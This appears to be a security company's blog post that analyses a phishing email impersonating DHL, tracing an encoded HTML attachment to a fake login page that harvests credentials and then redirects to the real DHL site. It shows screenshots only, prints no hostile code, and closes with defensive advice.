• ISSP

Phishing of DHL Accounts

Updated: Jul 20

Phishing is a very common way to acquire personal information such as usernames, passwords or financial information. Today we are going to discuss a real-life example of an elementary phishing e-mail from the fake DHL page.

DHL phishing case study

Let’s analyze the following e-mail:

Screenshot shows the fishing e-mail from sender pretending to be DHL
Fishing e-mail

As you can see from the screenshot, the attachment represents the htm page which the unsuspecting “parcel recipient” is advised to download.

If we look inside this document, we will see JS code containing a Unicode string value encoded with the help of “escape” function:

Screenshot shows the JavaScript code containing a Unicode string value
JS code with the Unicode string value

To decode this fragment we can use, for example, the following resource:

http://scriptasylum.com/tutorials/encode-decode.html

Screenshot shows the process of decoding
Screenshot of decoding

After decoding it becomes obvious that this is not the end and the text is still encoded, but this time using “base64”:

Screenshot shows the text that is still encoded with “base64”
Encoded text using "base64"

Ok, well, let’s decode this one as well. As a result, we have a code of the page run locally, which imitates the official DHL page and obviously fits for collecting DHL account e-mail addresses and passwords:

Screenshot shows the locally run code of the page that imitates the official DHL page
Locally run code of the fake DHL page

Among other things, the body of the page contains a link to the resource:

Screenshot shows the link to the resource of the fake DHL page
Code with the link to the resource

When attempting to visit the resource you are immediately redirected to the DHL website so that the user could make sure he/she is really on the DHL website without suspecting anything while checking the link in the browser:

Screenshot shows the HTTP Traffic
Screenshot of the HTTP Traffic

Judging by traffic, there is a post that transfers passwords and e-mail addresses that we entered on the false page, and then, just as expected, it redirects you to the DHL website.

Screenshot shows the code that redirects to DHL page
Code with redirection to DHL page

So, what you can see is the actual phishing of DHL accounts.

All that is left to do is to block the link through firewalls and remind users once again to be very suspicious about it, and to double-check the links asking for their passwords.

If you wish to learn more about ISSP Reverse Engineering services, please contact us using the form below

80 views0 comments

Recent Posts

See All